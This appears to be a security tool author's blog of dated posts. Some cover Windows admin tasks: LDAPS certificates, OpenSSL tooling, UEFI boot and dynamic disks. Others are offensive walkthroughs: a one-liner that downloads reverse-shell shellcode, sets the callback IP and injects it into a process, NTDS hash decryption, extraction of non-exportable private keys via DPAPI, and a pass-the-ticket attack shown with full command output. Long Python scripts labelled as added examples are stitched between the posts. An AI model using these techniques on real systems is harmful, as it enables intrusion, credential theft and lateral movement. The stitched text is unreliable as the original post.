Jul 31, 2023

NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996

The above will, in 3 steps:

-download a binary and convert it to its textual hexadecimal form

-replace the default outbound IP (127.0.0.1) with the real target IP (here 192.168.1.190)

-inject the shellcode into the memory of the specified PID and execute it

On the remote host: run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shellcode)

Jul 09, 2023

Decrypt NTDS (aka NT Directory Service) Active Directory hashes for servers up to Windows 2012 R2 (RC4) and Windows 2016 and up (AES). NTDS uses the Extensible Storage Engine format (aka ESE).

You can obtain the system key offline using nthash and the SYSTEM registry file.

Source code and binary are here.

Apr 04, 2023

You need to boot in UEFI mode but do not want to convert your disk to GPT (with mbr2gpt for instance)?

-free some disk space (by shrinking your main partition for instance)

-create a FAT32 partition

-make your partition bootable with bcdboot c:\windows /s g: /f all (with g: being your new partition)

-now, shut down your computer, switch your BIOS to UEFI mode, reboot and enjoy!

Mar 30, 2023

In a previous article (here), we have seen how to export a certificate and its non-exportable key using a rather complex method (decrypting DPAPI).

Here is how to do it the easy way (by hooking an rsaenh.dll API):

cert --export --store=root --subject="Root Authority" --force

-> you get a cert.pfx containing both the certificate and the private key.

Import and enjoy !

Mar 26, 2023

You want to export a certificate but its private key is marked as non-exportable.

Let's export it the hard way (a future article will demonstrate an easier method).

1/ Identify the cert SHA1 hash and save the cert from the registry to a .cer file
cert --enumcerts --store=root
->9EC82D0810FACD26CF5DE736C4F17228DDF49BBC is the cert SHA1 hash

->d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05 is the cert unique name

cert --dumpcert --store=root --hash=9EC82D0810FACD26CF5DE736C4F17228DDF49BBC
->you get a blob.cer, i.e. your cert (without the private key)

Let's convert this binary cert (DER format) to PEM format:

cert.exe --der2pem --filename=blob.cer

->you get a blob.crt

2/ Decode the DPAPI blob located in C:\Users\%username%\AppData\Roaming\Microsoft\Crypto\RSA\%SID%
nthash-win64 /decodeblob /binary:d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05

->this is your DPAPI blob, encrypted with a masterkey

Note: you can skip this step, as the blob will be decrypted in step 4.

3/ Decrypt the masterkeys located in C:\Users\%username%\AppData\Roaming\Microsoft\Protect\%SID%
nthash-win64 /decodemks /binary:c:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001 /password:your-sha1-hash-password /save

->the masterkeys will be saved to masterkeys.ini

4/ Decrypt the DPAPI blob with the masterkey (from masterkeys.ini)
nthash-win64 /decodeblob /binary:d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05 /save

->you get a decoded.bin
This is your decrypted DPAPI blob, i.e. your decrypted RSA private key.

5/ Convert the decrypted RSA key to PEM format

cert.exe --rsa2pem --filename=decoded.bin

->you get a decoded.pem

Note: we could also have done it in 2 steps: rsa2pvk and then pvk2pem.

6/ Create a PFX with your certificate and private key

Optionally, you can check that your certificate and private key share the same modulus:

tinyssl --print_private --filename=decoded.pem

tinyssl --print_cert --filename=blob.crt

Finally, create your PFX certificate:

tinyssl --pemtop12 --privatekey=decoded.pem --cert=blob.crt

->you get a cert.pfx, ready to import.

Enjoy!

Feb 25, 2023

Still pursuing my journey around LDAP, SSL and certificates: let's play with the OpenSSL libraries.

Have a look at the code on GitHub here.

Possible actions so far:

--genkey generate RSA keys public.pem and private.pem
--encrypt encrypt a file using public.pem
--decrypt decrypt a file using private.pem
--mkcert make a self-signed root cert, read from privatekey (optional) & write to ca.crt and ca.key
--mkreq make a certificate signing request, read from request.key (if it exists) & write to request.csr and request.key
--signreq make a certificate from a CSR, read from a CSR filename and a cert file
--selfsign make a self-signed cert, write to cert.crt and cert.key
--p12topem convert a PFX to PEM, write to cert.crt and cert.key
--pemtop12 convert a PEM to PFX, read from cert.crt and cert.key

Example to create a root CA, a certificate signing request and a certificate (which you can use in the latest Chrome):

rem if you want to reuse an existing key and therefore renew instead of recreate
tinySSL.exe --mkcert --debug=true --privatekey=ca.key --password=password --filename=ca.crt
rem recreate, not renew
rem tinySSL.exe --mkcert --debug=true --filename=ca.crt
rem renew, not recreate
tinySSL.exe --mkreq --debug=true --filename=request.csr --privatekey=request.key
rem recreate, not renew
rem tinySSL.exe --mkreq --debug=true --filename=request.csr
tinySSL.exe --signreq --debug=true --alt="DNS:*.groupe.fr" --password=password --filename=request.csr --cert=ca.crt

Note: have a look at this article if you want to test your certificate in an HTTP SSL server.

Jan 22, 2023

You have a running LDAP server but you want to be able to use SSL.

For this you need:

1-A root CA (certificate authority) installed on the domain controller/LDAP server in the computer "root" store

2-A CSR (certificate signing request) generated by the domain controller/LDAP server

3-The CSR signed by your root CA, thus giving you a certificate to be installed on the domain controller/LDAP server in the computer "my" store

4-The root CA installed in the client/user certificate store

Step 1

openssl genrsa -des3 -out ca.key 4096

openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

launch mmc.exe, load the certificate snap-in, select "computer account", choose the "trusted root CA" store and import your ca.crt.

Step 2

With Notepad, create the request.inf file below (adapt the CN to your server's CN).

;----------------- request.inf -----------------
[Version]
Signature="$Windows NT$"

[NewRequest]
Subject = "CN=dc1.acme.com,OU=IT,DC=dc1,DC=acme,DC=com,O=ACME,L=New York,S=New York,C=US"
;
KeySpec = 1
KeyLength = 1024
Exportable = TRUE
MachineKeySet = TRUE
SMIME = False
PrivateKeyArchive = FALSE
UserProtected = FALSE
UseExistingKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
ProviderType = 12
RequestType = PKCS10
KeyUsage = 0xa0

[EnhancedKeyUsageExtension]
OID=1.3.6.1.5.5.7.3.1 ; this is for Server Authentication

Generate your CSR with certreq -new request.inf server.csr.

Step 3

Sign your CSR (the server.csr produced in step 2):

openssl x509 -req -days 3650 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt

launch mmc.exe, load the certificate snap-in, select "computer account", choose the "MY" store and import your server.crt.

Reboot your DC: your LDAP SSL server is now operational.

Edit:

1/

It appears it is better to put the cert in the NT Directory Services (NTDS) store (choose the NTDS service rather than "computer account" in the MMC snap-in).

Indeed, most probably your computer account will have more than one cert in its store and NTDS will then pick one of them at random.

2/

Although I did have time to replicate the experiment, it may be that you have to select 2 roles (versus all): server authentication and client authentication.

More here.

Step 4

On your user/client, launch mmc.exe, load the certificate snap-in, select "user account", choose the "trusted root CA" store and import your ca.crt to allow your user/client to validate the server cert.
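Before submitting the request.inf from step 2, it is worth checking what the request actually asks for. The script below is an added example, not part of the original post and not one of the author's tools: it parses a constructed copy of the post's request.inf with a small INF reader (repeated OID= lines and ";" comments are the reason configparser is not used), then reports the settings a defender would question on a domain controller request. The thresholds it applies (2048-bit minimum, Exportable=FALSE, Server Authentication plus the Client Authentication EKU that the edit above mentions for NTDS) are this example's own assumptions, and the "hardened" variant is built from the posted file by substitution.

```python
"""Audit a certreq request.inf before it is submitted for an LDAPS certificate.

Added example: not part of the original post and not the author's tool. The
INF text is a constructed copy of the post's request.inf; the thresholds
(2048-bit minimum, Exportable=FALSE, required EKUs) are this example's own
assumptions about a hardened domain-controller request.
"""
from typing import Dict, List, Tuple

# Constructed copy of the post's request.inf, weak settings kept as they are.
REQUEST_INF = r"""
;----------------- request.inf -----------------
[Version]
Signature="$Windows NT$"

[NewRequest]
Subject = "CN=dc1.acme.com,OU=IT,DC=dc1,DC=acme,DC=com,O=ACME,L=New York,S=New York,C=US"
KeySpec = 1
KeyLength = 1024
Exportable = TRUE
MachineKeySet = TRUE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
ProviderType = 12
RequestType = PKCS10
KeyUsage = 0xa0

[EnhancedKeyUsageExtension]
OID=1.3.6.1.5.5.7.3.1 ; this is for Server Authentication
"""

# Same request with the corrected settings (and the Client Authentication EKU
# the post's edit mentions for NTDS). EnhancedKeyUsageExtension is the last
# section, so appending a second OID line lands in it.
HARDENED_INF = (
    REQUEST_INF.replace("KeyLength = 1024", "KeyLength = 2048")
    .replace("Exportable = TRUE", "Exportable = FALSE")
    + "OID=1.3.6.1.5.5.7.3.2 ; Client Authentication\n"
)

SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
KU_DIGITAL_SIGNATURE = 0x80   # first byte of the X.509 keyUsage bit string
KU_KEY_ENCIPHERMENT = 0x20


def parse_inf(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Minimal INF parser: keeps repeated keys (several OID= lines) and drops
    ';' comments. Section and key names are lower-cased (INF is case-insensitive)."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # values in this format never contain ';'
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            sections[current].append((key.lower(), value.strip('"')))
    return sections


def _get(section: List[Tuple[str, str]], key: str, default: str = "") -> str:
    return next((v for k, v in section if k == key.lower()), default)


def audit_request(text: str, expected_fqdn: str) -> List[str]:
    """Return the list of findings; an empty list means the request passes."""
    inf = parse_inf(text)
    req = inf.get("newrequest", [])
    findings: List[str] = []

    key_length = int(_get(req, "KeyLength", "0"))
    if key_length < 2048:
        findings.append(f"KeyLength={key_length}: RSA keys below 2048 bits are obsolete")

    if _get(req, "Exportable", "FALSE").upper() == "TRUE":
        findings.append("Exportable=TRUE: the DC's private key is marked exportable from the machine store")

    subject = _get(req, "Subject")
    cn = next((p.split("=", 1)[1].strip() for p in subject.split(",")
               if p.strip().upper().startswith("CN=")), "")
    if cn.lower() != expected_fqdn.lower():
        findings.append(f"Subject CN '{cn}' does not match the server FQDN '{expected_fqdn}'")

    key_usage = int(_get(req, "KeyUsage", "0"), 16)
    if not (key_usage & KU_DIGITAL_SIGNATURE and key_usage & KU_KEY_ENCIPHERMENT):
        findings.append(f"KeyUsage=0x{key_usage:x}: an RSA TLS server cert needs digitalSignature and keyEncipherment")

    ekus = {v for k, v in inf.get("enhancedkeyusageextension", []) if k == "oid"}
    if SERVER_AUTH not in ekus:
        findings.append("missing Server Authentication EKU " + SERVER_AUTH)
    if CLIENT_AUTH not in ekus:
        findings.append("no Client Authentication EKU " + CLIENT_AUTH + " (the post's edit notes NTDS may need it)")
    return findings


if __name__ == "__main__":
    for name, inf in (("as posted", REQUEST_INF), ("hardened", HARDENED_INF)):
        print(name, "->", audit_request(inf, "dc1.acme.com") or ["OK"])
```

Run against the posted file with expected FQDN dc1.acme.com, the audit reports three findings (key length, exportable key, missing client-auth EKU); the hardened copy passes. The CN check is there because a CN that does not match the DC's FQDN is the most common reason an LDAPS client rejects the certificate even though the chain is trusted.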

Oct 31, 2022

We will be discussing privilege escalation and/or lateral movement.

The theory.

You got yourself access to a host where other users (preferably local or domain admins) are logged on?

Let's:
-List the Kerberos ticket(s) with nthash-win64 /klist
-Export the TGS ticket with nthash-win64 /ask /input:service/fqdn
-Import (in another session, or on another host) the (preferably TGS) ticket with nthash-win64 /ptt /binary:ticket.kirbi

Note 1: an admin can act on the tickets of all logon sessions (pass the luid parameter)
Note 2: if host2/the attacker is a domain-joined computer, a TGT may be enough (your host "should" obtain the TGS when you request a service)
Note 3: this is not about requesting/forging a ticket (see Rubeus) but about stealing a ticket

Practical example.

On host1/victim, we can witness that the logged on user (user1) has access to a remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \\WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \\WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 288 576 octets libres

And indeed, there is a ticket which we may want to steal (cifs/WIN-BBC4BS466Q5.home.lab).

nthash-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Let's export this ticket to a file (which we will import later on).

nthash-win64.exe /ask /input:cifs/WIN-BBC4BS466Q5.home.lab
NTHASH 1.8 x64 by erwan2212@gmail.com
Asking for: cifs/WIN-BBC4BS466Q5.home.lab
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewUntil:07/11/2022 16:26:32
ServiceName: cifs/WIN-BBC4BS466Q5.home.lab
ClientName: user1
Flags: 40A50000
KeyType: 00000012
Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3
TicketEncType: 00000012
Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302

* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi

On host2/attacker, we witness that we do not have (yet) access to the target remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le nom d’utilisateur ou le mot de passe est incorrect.

Let's import our ticket (exported in the previous step).

NTHASH-win64.exe /ptt /binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi
NTHASH 1.8 x64 by erwan2212@gmail.com
Ticket successfully submitted for current session

Let's confirm that our ticket now appears in our current (attacker) session.

NTHASH-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Let's now finally confirm that we do have access to the remote share (although we are not impersonating the original "user1", nor do we know user1's password).

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \\WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \\WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 296 768 octets libres
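The two /klist listings above contain the evidence a defender can look for on a host: after the import, the attacker's session holds a cifs service ticket for user1 while its own user is someone else, and there is no krbtgt ticket for user1 next to it (a session that obtained the ticket itself would have one). The script below is an added example, not part of the original post and not nthash's own code. It parses the record format nthash /klist prints, decodes the Flags and EncryptionType values (KERB_TICKET_FLAGS bit values from ntsecapi.h, etype numbers from RFC 3961/4120), and applies those two checks; the two listings it works on are constructed after the output shown above, and the session user "attacker" is an assumed name.

```python
"""Check a logon session's Kerberos ticket cache for pass-the-ticket indicators.

Added example: not part of the original post and not nthash's own code. It
parses the record format that nthash /klist prints (as shown in the post) and
applies two checks a defender can run on a host: a service ticket whose client
principal is not the session's own user, and a service ticket with no TGT
(krbtgt/REALM) for that principal in the same cache. Both samples below are
constructed after the post's output.
"""
import re
from typing import Dict, List

# KERB_TICKET_FLAGS bit values (ntsecapi.h).
TICKET_FLAGS = {
    0x40000000: "forwardable", 0x20000000: "forwarded", 0x10000000: "proxiable",
    0x08000000: "proxy", 0x04000000: "may_postdate", 0x02000000: "postdated",
    0x01000000: "invalid", 0x00800000: "renewable", 0x00400000: "initial",
    0x00200000: "pre_authent", 0x00100000: "hw_authent",
    0x00040000: "ok_as_delegate", 0x00010000: "name_canonicalize",
}
ETYPES = {0x11: "aes128-cts-hmac-sha1-96", 0x12: "aes256-cts-hmac-sha1-96", 0x17: "rc4-hmac"}

# Constructed: host1, user1's own session (TGT plus a cifs service ticket).
HOST1_KLIST = """NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000
"""

# Constructed: host2 after the .kirbi import (one cifs ticket for user1, no TGT).
HOST2_KLIST = """NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000
"""


def parse_klist(text: str) -> List[Dict[str, str]]:
    """One dict per ticket; records are separated by blank lines."""
    tickets = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            if ":" in line:
                key, value = line.split(":", 1)   # split on the first ':' only (timestamps contain more)
                fields[key.strip()] = value.strip()
        if "Server Name" in fields:               # skips the banner block
            tickets.append(fields)
    return tickets


def decode_flags(hex_flags: str) -> List[str]:
    """Human-readable ticket flags, highest bit first (same order klist uses)."""
    value = int(hex_flags, 16)
    return [name for bit, name in sorted(TICKET_FLAGS.items(), reverse=True) if value & bit]


def ticket_indicators(text: str, session_user: str) -> List[str]:
    """Findings for one session's cache; empty means nothing unusual."""
    tickets = parse_klist(text)
    tgt_owners = {t["Client Name"].lower() for t in tickets
                  if t["Server Name"].lower().startswith("krbtgt/")}
    findings = []
    for t in tickets:
        client, service = t["Client Name"], t["Server Name"]
        etype = ETYPES.get(int(t.get("EncryptionType", "0"), 16), "unknown")
        if client.lower() != session_user.lower():
            findings.append(f"{service}: client '{client}' differs from session user '{session_user}' ({etype})")
        if not service.lower().startswith("krbtgt/") and client.lower() not in tgt_owners:
            findings.append(f"{service}: service ticket for '{client}' with no TGT in this cache (injected ticket?)")
    return findings


if __name__ == "__main__":
    print("host1:", ticket_indicators(HOST1_KLIST, "user1") or ["clean"])
    print("host2:", ticket_indicators(HOST2_KLIST, "attacker"))
    print("40E10000 ->", decode_flags("40E10000"))
```

On host1 (session user user1) nothing is reported; on host2 (assumed session user "attacker") both checks fire for the imported cifs ticket. The decoded flags also show the difference between the two ticket kinds on the page: 40E10000 carries initial (a TGT obtained directly from the KDC), 40A50000 does not. Sessions created with runas /netonly legitimately hold tickets for a different principal than the session owner, so the first check should be read together with the logon type rather than on its own.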

Oct 09, 2022

You have set up a new disk as a "dynamic disk" and now you want to go back to a basic disk.

But the option is grayed out in the Windows Disk Management console.

Let's see how to revert to a basic disk without losing data, with CloneDisk.

This procedure applies to an MBR disk, but a similar procedure can be performed on a GPT disk.

Warning: if you work on a production disk/system, please take a backup/snapshot so that you can roll back your changes if needed.

First you want to check the partition table: you do need a partition table to perform this operation, and if your disk is a "data" disk, i.e. not a "system" disk, your dynamic disk most probably does not have a partition table matching your existing volumes.

See the screenshots below:

-we have 2 disks (0 & 1): one basic (system) and one dynamic (data)

-we have 4 volumes (2 on each disk)

-the second disk (disk 1) does not have a partition table reflecting its volumes (since it is a dynamic disk)

You need to use the "RETAIN" diskpart command to instruct your system to create a partition table for your volumes.

Note that most probably you would not need to perform this task if your disk is a "system" one (the partition table will already have been taken care of by the system).

Now, let's have a look at the partition table again.

Much better 🙂

Now let's change the partition type for all partitions (0x42 indicates a dynamic disk).

We will change our partitions (here number 4 and 2) to 0x7, aka IFS (for NTFS), and we will hide the "dummy" partitions (left over from the dynamic disk) by setting them to 0x17, aka Hidden IFS.

And we will do an offline/online cycle to force the system to refresh its view of the disk (we could/should actually have performed this change offline and gone online once done).

Now let's check our Disk Management console again and "tada": our dynamic disk was reverted back to a basic disk 🙂
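The type-byte edit described above is a four-byte change in sector 0 (one byte per 16-byte partition entry, at offset 4 of each entry), so it is easy to verify on a saved copy of the MBR before and after the edit rather than trusting the console. The script below is an added example, not part of the original post and not CloneDisk's code: it decodes the partition table of a 512-byte sector, reports each entry's type, and applies the same change in memory (0x42 entries become 0x07 for the real volumes and 0x17 for the leftovers). The sector it works on is constructed for the example, with entries 2 and 4 standing in for the two real volumes mentioned above.

```python
"""Read and edit the MBR partition table of a disk image: dynamic-disk marker.

Added example: not part of the original post and not CloneDisk's code. It
decodes the four 16-byte entries at offset 0x1BE of a 512-byte sector so the
0x42 -> 0x07 / 0x17 change described in the post can be verified on a raw
image (or a saved copy of sector 0) before it is written back. The sector
below is constructed; entry numbers 2 and 4 play the two real volumes.
"""
import struct
from typing import Dict, List

PARTITION_TYPES = {
    0x00: "empty", 0x07: "IFS (NTFS)", 0x17: "Hidden IFS",
    0x42: "dynamic disk (LDM)", 0xEE: "GPT protective",
}
ENTRY_FORMAT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count
TABLE_OFFSET = 0x1BE         # 446: start of the partition table
BOOT_SIGNATURE = b"\x55\xaa"


def build_mbr(entries: List[Dict[str, int]]) -> bytes:
    """Construct a 512-byte sector from up to four {type,start,count} dicts (test data)."""
    table = b""
    for i in range(4):
        e = entries[i] if i < len(entries) else {"type": 0, "start": 0, "count": 0}
        table += struct.pack(ENTRY_FORMAT, 0x80 if e.get("active") else 0,
                             b"\0\0\0", e["type"], b"\0\0\0", e["start"], e["count"])
    return bytes(TABLE_OFFSET) + table + BOOT_SIGNATURE


def parse_mbr(sector: bytes) -> List[Dict[str, object]]:
    """Return the non-empty partition entries with their decoded type."""
    if len(sector) != 512 or sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("not a 512-byte MBR sector with a 55AA boot signature")
    parts = []
    for i in range(4):
        off = TABLE_OFFSET + 16 * i
        status, _, ptype, _, start, count = struct.unpack(ENTRY_FORMAT, sector[off:off + 16])
        if ptype == 0:
            continue
        parts.append({"index": i + 1, "active": status == 0x80, "type": ptype,
                      "name": PARTITION_TYPES.get(ptype, f"0x{ptype:02x}"),
                      "start_lba": start, "sectors": count})
    return parts


def is_dynamic(sector: bytes) -> bool:
    return any(p["type"] == 0x42 for p in parse_mbr(sector))


def retype(sector: bytes, index: int, new_type: int) -> bytes:
    """Copy of the sector with entry `index` (1-4) given a new type byte (entry offset 4)."""
    buf = bytearray(sector)
    buf[TABLE_OFFSET + 16 * (index - 1) + 4] = new_type
    return bytes(buf)


def revert_to_basic(sector: bytes, volume_indices: List[int]) -> bytes:
    """Mirror the post's edit: real volumes become 0x07 (IFS), every other 0x42
    entry (LDM leftover) becomes 0x17 (Hidden IFS). Nothing else is touched."""
    out = sector
    for p in parse_mbr(sector):
        if p["type"] == 0x42:
            out = retype(out, p["index"], 0x07 if p["index"] in volume_indices else 0x17)
    return out


# Constructed sector: four LDM-typed entries, two real volumes and two leftovers.
DYNAMIC_DISK = build_mbr([
    {"type": 0x42, "start": 63, "count": 1985},        # entry 1: leftover, to hide
    {"type": 0x42, "start": 2048, "count": 204800},    # entry 2: first volume
    {"type": 0x42, "start": 206848, "count": 2048},    # entry 3: leftover, to hide
    {"type": 0x42, "start": 208896, "count": 409600},  # entry 4: second volume
])

if __name__ == "__main__":
    for sector in (DYNAMIC_DISK, revert_to_basic(DYNAMIC_DISK, [2, 4])):
        print("dynamic:", is_dynamic(sector), [(p["index"], p["name"]) for p in parse_mbr(sector)])
```

Only the type byte changes; the start LBA and sector count of each entry, and the 55AA signature, must be identical before and after, which is exactly what to compare on the real disk (a copy of sector 0 taken with any raw disk reader before the edit) to confirm the data layout was not touched.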